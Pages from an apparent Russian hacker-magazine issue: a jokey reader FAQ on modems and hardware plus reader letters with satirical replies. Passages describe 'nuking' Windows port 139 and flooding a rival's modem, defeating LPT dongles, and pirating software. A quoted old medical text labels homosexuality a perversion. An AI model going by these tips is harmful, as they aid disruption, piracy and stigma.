Спецвыпуск хакер, номер #001, стр. 001-118-11, Можно ли программно увеличить

Можно ли программно увеличить

скорость связи

Спецвыпуск хакер, номер #001, стр. 001-118-11

Паяльник на ножке микросхемы держать можно не более 2 секунд.

Что такое половые извращения?

:

Цитирую мой любимый справочник бабушки-врача:

«Сюда относятся эксгибиционизм, гомосексуализм, мазохизм, садизм, фетишизм и пр.». (любителям сайтов типа www.fetish.com)

«Прогноз: излечения удается добиться в небольшой части случаев и то главным образом, где имеются бисексуальные тенденции. Алкоголизм резко способствует развитию половых извращений». (см. «что такое поинтовка?»)

«Профилактика: Правильное сексуальное воспитание, совместное обучение, психотерапия, гипноз, внушение». (когда писали справочник, не было компьютеров).

«Лечение: В ряде случаев важно понизить повышенную половую возбудимость, применяя для этого трудо- и гидротерапию, физкультуру, монобромистую камфару (далее идет долгое описание действия этой камфары, короче, после нее неделю не стоит)»

Так что ройте землю, господа интернетчики!

Что такое поинтовка?

:

От слова Point (точка). Поинты - это пользователи BBS или рядовые пользователи ФИДО и других дружеских сетей. На ББС-ке вешается объявление о поинтовке. Поинты встречаются в условленном месте, покупают 1,2,3,4... ящика водки (по вкусу) и выезжают за город. Сие есть настоящее экологическое бедствие. По рассказам аборигенов, во время одного из таких мероприятий снег в лесу был ровно-ровно утоптан в радиусе 5 километров.

(в зависимости от названия эхи в ФИДО встречаются также: фидопойки (общая для ФИДО, сбор в Сокольниках), карзовки (упивка кока-колой подписчиков эхи mo.cars и ru.cars), чертановоупивки (водочная упивка эхи mo.chertanovo) и т.д. (Прим. редактора).

Что

такое

елочка?

:

На материнской плате бывает слишком мало слотов для плат расширения (слоты PCI, ISA). Тогда в один из слотов вставляют плату-разветвитель с тремя и более дополнительными слотами. Платы расширения устанавливаются уже в нее. Только теперь они параллельны «мамке». Такое безобразие часто использовали в нестандартных корпусах. Но сейчас INTEL хочет применить это в своем новом форм факторе NLX. Платы расширения и так часто отходят - это стандартный глюк всех разъемов. В INTEL’е, видать, ночами не спят, думают, как бы это нам жизнь веселее сделать.

Вреден ли режим сна для винта?

:

Винт спит, трафик идет. Самые вредные моменты для винта - это его пуск и остановка. В это время очень сильно изнашивается механическая часть. Повышается вероятность случайного повреждения поверхности. Вообще считается, что винт, который крутится без остановки, живет намного дольше. Если только всякие вундеркинды не лезут с тряпкой и отверткой «протирать пыль с блинов и головок».

Если послать на

вражескую BBS 220v, то сгорит

ли у них модем?

:

Такого я сам никогда не пробовал и тебе не советую. Скорее, сгорит твоя АТС. Не вся, конечно, но навредишь ты им сильно. А главное — ты навредишь себе, т.к. после этого твой телефон работать не будет. Это еще цветочки, ягодки будут, когда придет злой дядя в усах - эксперт. АТС вправе подать в суд иск о возмещении тобой убытков. Ну там порча оборудования, которое у них испортилось за 10 лет. Словом, с ними лучше не связываться, если не хочешь всю жизнь копить на новую АТС. Некоторые думают, что на АТС есть защита. Да, наверное, есть, но и без нее телефон работает как военно-полевой. Все и так дышит на ладан, я думаю, не стоит смещать это хрупкое равновесие.


Спецвыпуск хакер, номер #001, стр. 001-118-12, Можно ли программно увеличить

Можно ли программно увеличить

скорость связи

Спецвыпуск хакер, номер #001, стр. 001-118-12

Что такое полупроводниковое реле?

:

Очень удобная штуковина. Бесконтактное реле ставится на многие современные модемы. Оно бесшумно и долговечно, это актуально для тех, чья АТС не держит тон. Ты долго дозваниваешься до провайдера или до BBS? А может, ты долбишься на MTV или к девушке, у которой ты — не единственный поклонник? Полупроводниковое реле тебе просто необходимо. Владельцы реликтовых модемов 14 400 сейчас сталкиваются с тем, что механические реле часто залипают или вовсе сгорают. Иногда модем то набирает номер нормально, то отказывается. Попробуй найти спеца. Лучше по знакомству, т.е. такого знакомого, у кого перепаянный им модем работает уже полгода. Это тебе обойдется ~5$. Если ты собрался это делать сам, то захвати свой модем со старым реле. На радиорынке продавцы тебе подскажут полупроводниковый аналог. Перепаивая реле, используй правила работы с микросхемами (см. как выпаять микросхему.). А это тебе обойдется парой обоженных пальцев, сгоревшим модемом и паяльником, который ты со злости выкинешь в окно.

С чем связаны

сезонные

колебания связи

с провайдером?

:

Действительно, качество связи зависит от времени года. Понятно, что летом, когда в городе становится просто невозможно нормально существовать, значительная часть народа сваливает куда-нибудь подальше от цивилизации. Они-то и разгружают телефонную линию. Не стоит забывать о том, что от обычного домашнего пользователя до АТС идет проволочный кабель. Он может промокать и замерзать, от этого сильно зависят его свойства. На заре телефонии большой проблемой были крысы, которые перегрызали кабель. Теперь у телефонного кабеля есть специальная броня от грызунов, но это не может обеспечить 100% защиты. А зимою мыши спят, как известно.

Что такое АЦП

и ЦАП?

:

Аналого-Цифровой Преобразователь, Цифро-Аналоговый Преобразователь. Современные ПК работают только в цифровом режиме, т.е. они способны оперировать только нулем и единицей. Для того чтобы машина принимала или выдавала обычный электрический сигнал, нужен ЦАП и АЦП. Обычно такие устройства интегрированы в одну плату. Модем и звуковая карта содержат в себе ЦАП и АЦП. Еще среди радиохакеров популярны электронные осциллографы. Недорогие карты для ПК могут справиться только с небольшими частотами, но зато могут запомнить картинку сигнала. Это очень удобно, когда ломаешь сотовую связь.

Что такое

ключ

на LPT?

:

Мне кажется, что ключ на параллельный порт придумал Карабас Барабас. Ключик - маленькая коробочка с разъемом, если ее не вставить в порт, то программа работать не будет. Такая аппаратная защита была, к примеру, на старых версиях CAD. Бороться с нею просто — пойти и купить пиратскую версию программы. Теперь ключей уже не делают. Но если приспичило, можно скопировать ПЗУ внутри ключа на программаторе и сделать таких ключей хоть мешок. Еще можно деассемблировать программу и вручную избавить ее от ключевой патологии, развлечение из серии «забить гвоздями CDROM» или отформатировать дискетку 1.44 на гигабайт.


Спецвыпуск хакер, номер #001, стр. 001-118-13, Можно ли программно увеличить

Можно ли программно увеличить

скорость связи

Спецвыпуск хакер, номер #001, стр. 001-118-13

Что делать,

если в компе

поселились

тараканы

или муравьи?

:

Ни в коем случае их не трогай, возможно, это специальные тараканы, которые улучшают работу процессора. Определить это можно так: поймай таракана и положи перед ним проц и горбушку хлеба. Если он выберет микросхему, то извинись и положи его на место. Если насекомое выберет горбушку, то твои дела плохи. Такие тараканы совершенно безграмотны, они часто устраивают короткие замыкания или застревают в дисководе. Срочно проводи капитальную чистку компьютера с применением ядохимикатов и бактериологического оружия.

Как крепить

сетевой кабель?

:

Это действительно актуально, т.к. многие делают локалку дома. Ясное дело, неприятно, когда кто-то спотыкается о незакрепленный провод: мат, грохот, травмы, обрыв кабеля. Сетевой кабель можно повредить, если прибивать его просто гвоздями к плинтусу, да и держаться он будет неважно. Продается специальный пластмассовый крепеж, но он стоит дороговато, его всегда не хватает. Разрежь обычную пластиковую бутылку из-под газировки на небольшие полоски. Полоску удобно обернуть вокруг кабеля, а соединенные концы прибить к стенке. Место для гвоздя заранее проткни шильцем, чтобы не попасть молотком по пальцам. Иначе ты сможешь пользоваться только мышкой.


Спецвыпуск хакер, номер #001, стр. 001-126-1, Письмо:

Письмо:

Alex Korolev

Спецвыпуск хакер, номер #001, стр. 001-126-1

aka Bruce Willis

raistlin@cityline.ru

[Unofficial Bruce Willis Fan Page] http://www.fanats.com/ bruno

Здарова, кул Хацкер! Ты прикинь, баклан, я до этого никогда в жизни не писал письмо в какой-либо журнал, а знаешь, почему? Да потому, что все журналы — суксь и маздай, отстой и лажа. Но ХАКЕР — это очень круто. Никогда в своей жизни я не прочитывал ВСЕ рубрики какого-либо журнала по все той же причине. Тебя же прочитал полностью. Просто хотелось поблагодарить и сказать, что с нетерпением жду второго номера.

Кстати, один совет: может, это не мое дело, но, по-моему, лучше бы вам поменьше про игры писать. Вот Феррум — это круто. Нужно еще Варез добавить. С юмором у вас на 158% (сам подсчитывал!) в порядке. Единственный оттенок лажовости — это много про игры пишете. Вот если бы вы публиковали какие-нибудь хацкерские тактики прохождения помимо кодов :), это было бы интересней. А обзоры как-то уже приелись. Пусть «Страна Игр» занимается этим — это их профиль.

Ладно, на этом заканчиваю мою нудную повесть...

Надеюсь, свидимся еще..

Best regards, Alex Korolev aka Bruce Willis.

:

Брюс!!! Это ты???

Просто поверить не можем! А мы-то думали, что после того, как ты снялся в «Осаде», ты преспокойненько отсыпаешься. А вот и нет. Оказывается, ты почитываешь наш журнал! Ну что ж, нам льстит, конечно, что даже такие крутые люди, как ты, получают удовольствие от нашего журнала. И в свою очередь, мы тоже можем сказать, что ты нам очень нравишься и что у тебя с юмором тоже все в порядке.

Мы прислушиваемся к твоему мнению, и отныне игровая часть журнала будет постепенно уменьшаться, а вот статей про всякие хаки-креки-фрики будет все больше и больше. Редактору игровой части очень понравилось твое предложение писать побольше о том, как «проходить» игры, и мы будем стараться публиковать побольше такого материала.

Надеемся, ты будешь нашим почетным читателем #1.

Ждем от тебя новых ролей и новых фильмов!

Письмо:

WBR,aagr

aagr@yahoo.com

UIN 12368570

2:5020/2424.666

Izvinite, no zurnala vashego shas pod rukoi net...

Voobshem, naschet upgrade FLASH BIOS v modemah. Vi v etom dele lamera (ne znae-

te — ne pishite) — eto srazu vidno. Estest-

venno, pisali vi o 3COM/USR modemah(esli ne znaete, 3COM kupila USRobotics).

Nu kak, izvinite menya, mozno proupgradit’ Sportster, tak chtobi on dumal, chto on Cou-

rier. Soobrazaite mozgom, a ne naobum govorite...

Prichem, esli on budet dumat’, chto on Courier — eto z rulezzzz, Courier 200$, Sporster 100$.

Esli modem ne rabotaet na v90,x2 -eto ne obyazatelno krivaya prosivka...Liniya mozet bit’ slishkom plohoi ili podnastroit’ ego nado...Mozet, dlya vas, lamerov, upgrade modema — eto GIMOR, to dlya normalnogo, razbiraushegosya v modemah cheloveka — eto plevoe delo...

P.S. V glazah moih znakomih i menya posle etogo vot tupogo zayavleniya rating vashego zurnala upal na 99.99%. Dumaite pered tem, kak pisAt’. OK?

:

Уважаемый aagr!

Мы очень долго не могли раскодировать ваше письмо, так как такой кодировки не было ни на одной из наших редакционных машин. Но нам все же удалось найти одного старца, который рассказал нам, что в давние времена, когда люди еще не умели русифицировать Unix, они писали таким вот образом, и называлось это странным словом «транслит». Он же рассказал нам, что теперь любой школьник может скачать русские шрифты из Интернета и установить их на свою машину за 5 минут. А уж о том, как сделать наклейки на клавиатуру с русскими буквами, он нам много рассказывал. Приводил пример, когда в 89-м году у него был NoteBook, не русифицированный, а в магазинах наклейки еще не продавались, и он сделал их сам из лейкопластыря.


Спецвыпуск хакер, номер #001, стр. 001-126-2, Письмо:

Письмо:

Alex Korolev

Спецвыпуск хакер, номер #001, стр. 001-126-2

Насколько мы поняли, вам не понравился наш пример, где мы пишем о том, как после перепрошивки модема «Внутренний Sportster стал считать себя внешним Courier». Должен вас огорчить. Это самая что ни на есть правдивая история. Как вы должны были понять, мы — журнал научно-академический, серьезный, и допустить такого ляпа просто не смогли бы. Поэтому мы специально связались с автором и попросили его предъявить нам этот модем. Что он с удовольствием и сделал. Да, действительно, этот бедолага не только чувствует себя внешним Courier’ом, но еще и часами с кукушкой, поэтому каждый час он пытается отстрельнуть какую-нибудь микросхему и выдать нецензурное слово.

Письмо:

DarK_LeT

Приветище, X!

Ну, в общем, тема журнала ничего! Но если бы немного о безопасности, защите в Сети и т.д.! Ведь многие даже не представляют себе, как опасен Интернет, и поэтому даже не задумываются о том, что в их компе давно сидит вирустрояна, и кто-то без всяких проблем лазит по их компу и пользуется входом в Инет!

И поэтому предлагаю новую рубрику «X — Net», в которой будет все о прогах и тому подобное!!!

Ну а в общем, побольше бы инфы именно по софту, а не по геймам!

Хотя Хакерство — это жизнь, но и ИНФА тоже классно!

Удачи в развитии!

P.S. Hack-NoN-StoP !!!!!!!!!!!!!

:

Привет, DarK_LeT!

Господи! Ну и вещи ты рассказываешь! Кошмар какой! Хакеры, троянцы лазают, вход в Интернет воруют! Ужас!

Нет, нет, нет, приятель. Ни о каких таких вещах мы рассказывать, конечно, не будем. Лучше мы, как всегда, поможем тебе научиться делать макраме и вышивать крестиком. А вместо этой ужасной рубрики «X-Net» мы решили открыть рубрику «Я сама», где научим тебя, как правильно завязывать бантики и косички, и порекомендуем правильную диету.

Письмо:

Arthus

arthus_m84@geocities.com

... В общем, почитал я тут журнальчик Ваш немного, и хочется пару ласковых сказать...

СПАСИБО, ЧТО ВЫ ПОЯВИЛИСЬ!!! Долгих Вам лет жизни и процветания заодно!!! И не только потому, что я теперь крякать все и вся могу (а я этим увлекаться не буду), а хотя бы за то, как Вас интересно читать, впитывая весь этот юморок, просто приятно, про Хумор же вообще говорить не приходится, мне его еще надолго хватит (воспоминаний).

В общем, с огромной благодарностью, МЫ с его Высочеством :-).

P.S. Кстати, Вы долго объясняли, как вручную протестировать систему на готовность к 2000 г.

Вы вот говорили, что ЕСЛИ дата станет 1 Янв 2000, то система готова...

Но не подскажете ли, что делать, ЕСЛИ система НЕ покажет 1 Янв 2000 ???


Спецвыпуск хакер, номер #001, стр. 001-126-3, Письмо:

Письмо:

Alex Korolev

Спецвыпуск хакер, номер #001, стр. 001-126-3

:

Привет, Arthus!

Спасибо тебе за добрые слова.

Если ты сделаешь наш тест на Y2K, а машина не покажет 1 января 2000 года, то это значит, что твой BIOS абсолютно не готов к этой проблеме. На некоторых материнских платах можно просто поменять микросхему с BIOS’ом, тогда тебе нужно будет купить современный BIOS и просто заменить его. Но вот если у тебя он жестко запаян в «мать» и не перепрошивается программно, то ты попал. Придется менять всю «мать». С другой стороны, старую «мать» ты сможешь впарить какому-нибудь врагу. И 1 января 2000 года злорадно потирать ручонки. А вообще-то, наш тебе совет: измени год на твоем компьютере на 1980, и еще 20 лет будешь радоваться жизни.

В общем, в любых неприятностях нужно искать и положительные стороны. Как всегда делает редакция X.

Удачи!

Письмо:

...ВиктОр

malukov@mail.ru

Привет, ХАКЕР.

Журнал ваш, в принципе, понравился, НО мало статей хакерских типа «взлома» автоответчика. НАДО больше, а про игры можно меньше, и так журналов про игры много...

Очень хотел бы видеть диск к журналу, со всякими там программульками и с описаниями.

Будем ждать новых номеров.

Ваш новый фанат.

:

Спасибо за письмо! Ты правильно заметил, что игровых журналов очень много развелось. Сейчас мы над этим работаем. Думаем, за месяц нам удастся уменьшить их количество (вот взялись сейчас за «Навигатор Игрового Мира»).

Что касается диска, то действительно, есть куча полезного софта, всяческих программ. Мы обязательно с тобой ими поделимся! Мы вот только не решили, какими дискетами комплектовать журнал. Нам все говорят, что сейчас самые распространенные на 3.5’’. А у нас в редакции только 5-дюймовые дисководы, даже не знаем, как быть. Говорят, сейчас какой-то новый носитель появился, CD-ROM называется, может быть, его постараемся сделать в ближайших номерах.

Письмо:

From: Andrey B.

blank@north.ru

Привет из с

олнечного Норильска!

Журнал у вас, конечно, получился рулезный, давно такой ждал, молодцы, одним словом! Но, почитав письма читателей во 2-ом номере журнала (многие из которых сводились к тому, чтобы сократить раздел об играх), мне пришла одна мысля: а что, если сокращать раздел об играх рационально? То есть открыть новый раздел «Лажа» (название подходящее), где автор будет откровенно высказывать свое мнение относительно плохих (на его взгляд) игр. Таким образом вы убьете сразу двух зайцев — сократите раздел об играх и расширите раздел «Хумор». Поехали дальше... Ваш журнал как называется? — Правильно, «Хакер». Ну и где, я вас спрашиваю, статьи о Митнике и прочих гигантах? — Нехорошо получается, они ведь нам как братья должны быть, а мы их так... Неплохо было бы и исходники каких-нибудь интересных программ давать, хотя я вру, этому место — на вашем сервере.

Пока!

Chester.

:

Привет, Андрей!

Ну, конечно, конечно же, у нас будут лажовые игры. Хотя кто сказал — будут? Они у нас уже есть! Ты что, нашу рубрику «Крематорий» не читаешь?

А по поводу Митников и прочих ты прям как в воду глядел. Как раз недавно нам позвонил из тюрьмы Митник, а на другой линии в это время висел Левин вместе с Моррисом, и все они хором просили нас написать о них статью. Ну, мы-то, честно говоря, это дело не любим. Ну что нам Митник? Ну кто такой Митник? Вот Бивис или Батхед, или Задхед, или Бархат, или как там их... Вот это наши ребята! Вот про них бы мы с удовольствием написали. Но ничего с собой поделать не можем, как всегда идем на поводу у читателей и уже в 4-м номере сделаем статью о самых-самых кульных хацкерах.


Спецвыпуск хакер, номер #001, стр. 001-126-4, Письмо:

Письмо:

Alex Korolev

Спецвыпуск хакер, номер #001, стр. 001-126-4

Письмо:

Rem

rem-darbinyan@mtu-net.ru

Hi, XAKEP.

Ну, вот и вышел второй номер вашего журнала. По сравнению с первым номером в нем еще больше юмора. Хотелось бы увидеть раздел про всякие хакерские программы с их описанием. И еще — рассказы о дырках, которые уже давно закрыты (в частности, это касается RLE), не очень интересно читать. Как насчет того, чтобы вам самим что-то взломать и рассказать об этом в следующем номере журнала.

Успехов и процветания вам!

:

Типа здравствуй, Rem.

Про программки мы тут как раз тоже вспомнили, и в этом номере они уже есть. Мы тут тебе набросали штук 20-25. Хватит? Правда, мы ими никогда не пользовались, просто у нас компьютеров нет, но тебе советуем. Ээээ... правда, там это... ну, в общем, машина может рухнуть у тебя... от этих... ну, которые на обложке. Но мы надеемся, что ты с этим справишься, а не справишься, так получишь классное сексуальное развлечение в стиле статьи «В поисках секса».

Письмо:

Vasia Craps

vacraps@hotmail.com

Хай, X! (Ну, я, наверное, не первый так поздоровался).

Могу сразу сказать, что magazine ничего, вполне даже неплохой, и впаривать, как все круто, не буду (Вы уж, наверное, наслушались). Однако смею предложить добавить пару разделов.

One: поскольку Вы все (в редакции, насколько я понял) кул квакерсы, то почему бы не ввести Q-раздел. В свое время в «Навигаторе» была Q-zone, но накрылась медным тазом, а жаль. Я так думаю, найдется очень много peоples для которых эта тема очень интересна на бумажной основе и на русском языке. Что здесь писать — сами знаете (Новости Q, Q2 и Q3, Игрухи на основе Q-engine, Описания МОДов, Секреты консольных скриптов, Похождения русских кланов, ...). Опять же Гоблин бы развернулся на полную мощь.

Two: в свете всеобщего MS Must Die и распространения бесплатных унихов, я думаю, была бы очень интересна тема типа «в помощь юному линуксоиду» или что нибудь в этом роде. Ну, здесь много, на чем можно развернуться (опять же сами знаете), направлений очень много, тем более что вроде бы нет журналов, посвященных унихам на русском (я не видел).

Ну, в общем, все...

С уважением...

VasiA, Craps

:

Хай, Вася!

А кулквакерсы — это как? Это те, которые квасят по-черному, или те, которые любят памперсы и сникерсы? Короче, мы так и не поняли, какие там памперсы тебе нужны, поэтому ответим про Q-Zone. Ку-Зоны у нас не будет. Но у нас будет, и даже уже есть «Дет.матч», или как там его. Гоблин захапал себе эту рубрику и с воплями «Ух! Расскажу!» решил там все о Кваке рассказывать. Ну и мы, может, чего умного ввернем (правда, мы уже не помним, когда это у нас в последний раз получалось). Короче, будут, будут тебе и памперсы, и сникерсы, и квакерсы, и какао с чаем. Только и успевай аплоадить все это себе в мозги.


Спецвыпуск хакер, номер #001, стр. 001-126-5, Письмо:

Письмо:

Alex Korolev

Спецвыпуск хакер, номер #001, стр. 001-126-5

И про Унихи мы тоже решили написать. Унихи — это те, которые не Форточки и на которых настоящие большие дядьки хацкеры сидят? Если мы тебя правильно поняли, то напишем и о них тоже.

Письмо:

Vladimir

DrDark@usa.net

Здрасте...

Сначала, когда мне сказали, что появился такой журнал, как «Хакер», я подумал, что это гон, но все же с надеждой на то, что это правда, стал его высматривать по киоскам..

Купив 1 номер и прочитав его, я понял, журнал должен носить название на Хакер, а Ламер или Геймер. Из 100 страниц журнала 70 занимают статьи про игрушки...

Ваш 2 номер поразил меня еще больше, ТАКОГО ГОНА ЕЩЕ НЕ БЫЛО НИКОГДА! Вы так прогнали про метро, ...что, кажется, у нас в стране работают только одни ламахи... А то старье, про BackOriffice и NetBus, от которых щас защитился не только каждый юзверь (т.к. любой, у кого стоит AVP или Norton Antivirus, уже защищен от этого ламерства), но и провайдеры закрыли порты у себя, вы описали как новинку в хакерском мире...

Вообще, складывается впечатление, что ваши знания компа ограничиваются играми и справочником «Как запустить Windows98» :).

Best regards... Vladk

DrDark@usa.net

:

Ну, здравствуй, коль не шутишь, Владимир.

Скажем тебе по секрету, что «Как запустить Windows98» и «Что такое кнопка Пуск» — это наши настольные книги. Только их мы и читаем. А ты как догадался? Видимо, тоже почитываешь, на досуге. А что тебе не понравилось в статье про метро? Что, не нашел на карте острова Бутаритари? Так поищи получше. Подскажем: это где-то между Индией и Австралией. Или ты не понял, что такое изолента? Ну да не важно. Крутым хацкерам типа тебя изолента не нужна, верно. И BackOriffice или NetBus тебе тоже не нужен, факт. Ты же только провайдеров ломаешь, что тебе опускаться до обычных юзеровских машин. А провайдеры оказались не дураки, дырки заткнули. Ну да ничего, мы искренне надеемся, что ты, как самый крутой хацкер на нашей планете, все равно найдешь способ их взломать, невзирая на защиты.

Письмо:

anshev

fpbz@moscow.portal.ru

Здравствуйте.

Нет, на сей раз сопливых выкриков вроде «спасибо, что вы появились (есть)» не будет. Хватит. Надоело. Будет спор. Спор со всякими, кто настойчиво (и глупо) советует вам сократить количество листов журнала, отведенных под описание игр. Заклинаю вас всем, что вам свято, дорого и просто небезразлично: не слушайте их. Да, я согласен, что про взлом материала не так уж много, но зачем же наращивать его в ущерб таким интересным описаниям игр? Тем более, что игры вы описываете просто замечательно, и журнал GAME.EXE , который я считаю лучшим игровым журналом, приобрел в вашем лице серьезного конкурента.

В общем, соблюдайте баланс, иначе геймеры на вас обидятся и перестанут вас читать.

Ash.

aash@centro.ru

:

Приветище, Ash!

Ну да, верно. Мы даже и не будем с тобой спорить. Обломался, да? :) Правильно, не фига слушать там всяких загруженных компьютерщиков, которые, кроме железа и Интернета, больше ничем не интересуются. «Взлом, Секс, музыка и компьютерные игры!» — вот наш девиз. Поэтому игры будут, будут и еще раз будут. Ну да, чуть поменьше, но зато еще более прикольные. На самом деле мы решили раз и навсегда поставить в этом вопросе точку. Мы любим игры, мы играем в игры, и 90% наших читателей делают точно так же. Но, в отличие от других журналов, мы любим об играх потрепаться по-дружески, а не грузить читателей рейтингами по графике, качеству звука и геймплею.


Спецвыпуск хакер, номер #001, стр. 001-126-6, Письмо:

Письмо:

Alex Korolev

Спецвыпуск хакер, номер #001, стр. 001-126-6

Письмо:

Sergey Klishin

serafima@mtu-net.ru

ICQ #33567349

Привет, Хакер.

Крайне была разочарована, когда прочла в мартовском номере статью: «Как поиметь девочку из чата».

Во-первых, вы сами-то эти способы пробовали прежде, чем советовать? Не уверена.

Рискните, (здоровьем), особенно с девушкой, которая metall — ничего не выйдет. «Девятая» Балтика, чипсы и билет на «Горбушку»? Слишком дешево цените...

Во-вторых, всех под одну гребенку не расчешешь, так что успех с помощью ваших советов гарантирован примерно 1:10.

Это чисто мое, женское мнение, и я думаю не единственное. У всех девочек есть мальчики, и это надо учесть...

И, наконец, последнее — третье: чему вы учите молодых глупых мальчиков? Чему? Просто подталкиваете на измену с девочками из Сети. Просто бьете такое хрупкое, но счастье. Учите, но явно не тому.

А в целом, неплохой журнальчик, желаю процветания и удач. Пока, до скорого! Светик.

:

Ох, Светик, Светик... То ли Светик, то ли Sergey... Ну не важно, ведь «у всех девочек есть мальчики», а некоторые сами себе девочки, сами себе мальчики.

Ну, поехали. Во-первых, профессор Левински — наш эксперт по сексу, и статьи он пишет только по собственному опыту. Правда, после десятка писем от девушек с вопросами «А почему все только для парней?» он решил сделать статью «Как трахнуть чувака из Инета» и сейчас активно над ней трудится. В процессе написания выяснилось, что все не так просто, как казалось в начале. А про «девятую» Балтику он не наврал — его 4-я, 7-я, 31-я и 82-я жены были сняты именно этим способом.

Во-вторых, гарантировать на 100% мы можем только то, что все мы умрем (некоторые даже в страшных муках :)). А то, что любая девушка отдастся нашему хацкеру после первой же фразы: «Ну, типа, здорова, чувырла!», мы обещать не можем. Но вот то, что НЕ «у всех девочек есть мальчики» — мы гарантируем на 100%! А часто девчонки ищут парня для секса, имея при этом постоянного бойфренда. А в Сети таких красоток — море!

Ну и последнее — третье: молодых, но вовсе не глупых мальчиков, мы вообще не учим. Учат пусть преподы в школах и институтах, а мы рассказываем. И никогда не будем рассказывать о том, как там всякие галимые маски мазать себе на физиономию и пироги печь, а вот о сексе, взломах и разных приколах мы будем писать всегда. Потому что именно это нравится как нам, так и парням, которые нас читают.

Так что удачи со своим бойфрендом, Светик.

Письмо:

olkhset

olkhset@online.ru

Hello, Хакеры!

Пишет вам Deto Freeman из Красноярска.

Две недели назад купил ваш журнал. Узнал о нем из многочисленной рекламы на сайте www.gameland.ru (захожу ежедневно!). Решил приобрести — и что вы думаете — конечно, понравился! В своем письме я хочу сказать вам пару слов о вашем творении и задам пару вопросов (ответите?).


Спецвыпуск хакер, номер #001, стр. 001-126-7, Письмо:

Письмо:

Alex Korolev

Спецвыпуск хакер, номер #001, стр. 001-126-7

О журнале...

Ваш magazine классный! Куча полезной информации... Можно вас спросить, плакат или CD (с софтом из I-Net) будет? И еще, сделайте другой переплёт, а то я пока весь журнал прочитаю, сто раз его открою и закрою — вот он у меня и разошелся на двадцать частей!

Вроде бы все... мой е-майл: olkhset@online.ru! Deto.

:

Спа-си-бо! Вот любим мы таких читателей, ничего с собой поделать не можем. Наверное, мы любим, когда нас хвалят. Впрочем, когда нас ругают по делу, а не просто «Журнал — дерьмо», то такую критику мы тоже любим.

По поводу диска нас спрашивает очень много людей. На данный момент этот вопрос еще обсуждается, но скорее всего, через пару номеров (а может, и раньше) мы начнем прикладывать CD-ючок, со всякими прикольными программульками, которые понадобятся в суровые будни хакерства. И о постере мы уже серьезно думаем. Все будет, не сразу, но все будет. А по поводу переплета ты фишку не просек. Но не расстраивайся, не ты один. Это был наш маленький эксперимент. Мы сделали самоуничтожающийся номер, чтобы врагам было труднее под нас копать. Правда, типография нас подвела и вместо заказанных нами исчезающих чернил напечатала все обычной краской.

Письмо:

Ru

djkaban@chat.ru

Большой хай всей редакции журнала Хакер. У вас самый клевый и интересный журнал. Так как меня очень прет ваш журнал, я и хочу пожелать вашему журналу всего наилучшего и чтобы он был толще и еще интересней, и не слушайте никого, кто говорит, что ваш журнал — туфта. Поверьте, у вас классный журнал, и все мои друзья его любят! И чем еще мне нравится ваш журнал, что он не скучный, как «Страна Игр» или «Game.Exe». И дизайн у вас покруче других журналов. В общем, у вас самый интересный прикольный журнал на свете!!! :-) Кстати, я попытался собрать вашу штуку для заглушки телека, но у меня ничего не получилась, и мне очень жаль :-(

Ваш постоянный читатель.

:

Знаешь, про глушилку телевизора мы получили много писем. Одни нас благодарили и говорили, что все круто, телеки заглушены, задача выполнена, другие ругали и кричали, что вся эта схема — фуфло и ничего не работает. А на самом деле нужно было просто-напросто повнимательнее читать статью. Мы же предупреждали, что эта штуковина будет работать не у всех. Если антенна экранирована, да еще и по кабелю выведена в соседний дом, то наша глушилка превращается в розовую птицу Обломинго.

Письмо:

Max Poliakov

Max.Poliakov@p1.f1800.

n5020.z2.fidonet.org

Пpивет, X... Прочитал вот тут третий номер, равно как и два предыдущих. Журнал вышел прикольный. Даже очень. Радует присутствие юмора, а главное — он написан МОИМ языком, т.е. все очень пpикольно и ясно. Но хочется вот что сказать: следуя зову названия журнала, напечатали вы в рубрике «Взлом» всякие прикольные штуки по поводу хакинга. Все это pулезно и архинужно. Но есть люди, к коим, к своему стыду, причислен и я, которые в этом полные ламы. Идея: текст менять не нужно, он должен писаться технически сложным языком, но нужно завести рубрику, объясняющую азы всего этого, для ламов. 90% ваших читателей купили журнал, чтоб что-нибудь узнать про хакинг... Многие не знают, что означает «нюкать», «флудить» и все такое. Имхо это надо объяснять. Ориентируя статью на людей, которые это знают и понимают, вы им не сообщаете ничего нового, имхо. А в основном, все очень пpикольно.


Спецвыпуск хакер, номер #001, стр. 001-126-8, Письмо:

Письмо:

Alex Korolev

Спецвыпуск хакер, номер #001, стр. 001-126-8

Есть предложение: нумеровать страницы в HEX ;)

ЗЫ: Если эта месага дошла до Вас, отпишите что-нибудь, плиз.

ЗЗЫ: В чем прикол объявы на 96-й странице?

:

Максим, ты хорошо поступил, что без тени стеснения называешь себя ламером, когда что-нибудь не понимаешь. В основном, люди любят выпендриваться и показывать, какие они крутые, даже если они ни хрена не понимают. Мы прислушались к твоей просьбе и решили создать «Словарь Хакера», в котором будем объяснять разные термины и непонятные слова. А по поводу «нюкать» и «флудить» — все просто. «Нюкать» означает использовать программу Nuke, которая бьет по 139 порту Windows и вешает машину. Очень распространенная программа во время Интернет-войн. «Флудить» означает посылать пакеты данных (чаше всего мусор) на модем противника, вызывая тем самым у него «дисконнект» (разрыв связи). Чаше всего модем не может выдержать такого потока данных и просто «захлебывается».

Хотя, честно говоря, мне странно, что ты этого не знал, ведь, судя по твоему адресу и сленгу, ты — фидошник (все эти «ЗЫ» и «ИМХО» :)).

Про объяву: ты, наверное, имел в виду объявление про бесплатный Инет? Ну да, провайдер Караван с 3 часов ночи по 5 телефонам давал Инет абсолютно нахаляву. Правда, после публикации в нашем журнале, эту халявку прикрыли. Ну да ничего, существуют и другие халявы, мы о них напишем.

Письмо:

Tornado

comadoro@transit.samara.ru

Что такое «почтовый клиент»? И текстовый редактор Notepad — это, случайно, не всем известный блокнот?

Заранее благодарен. С уважением, Tornado.

:

Здравствуй, Tornado!

Честно говоря, мы сами не знаем, что такое «почтовый клиент». Что-то связанное с почтой, а вот что? Мы как понимаем: «почтовый клиент» — это клиент почты. Отправляешь ты письмо или посылку или перевод — вот ты и есть «почтовый клиент». Мы пытались поточнее выяснить это у автора, но он куда-то пропал. На телексы не отвечает, и все собачьи упряжки, что мы к нему посылали, не вернулись...

А по поводу Notepad’a ты погорячился! Ну какой же Notepad — Блокнот??? Ты что говоришь-то? Что такое Notepad, мы тоже не знаем. Но если вдуматься, то можно понять вот что: Notepad — от слов Note и Pad. На всех порносерверах Note означает «Внимание», а если верить нашему авиационному словарю, то Pad — это «Стол». А значит, Notepad — это какая то хитроумная хакерская программулина, привлекающая внимание глупого ламера и заставляющая его биться головой о стол. Очень полезная вещь, должно быть. Мы обязательно поищем ее в Сети и расскажем о ней в будущих номерах.

Письмо:

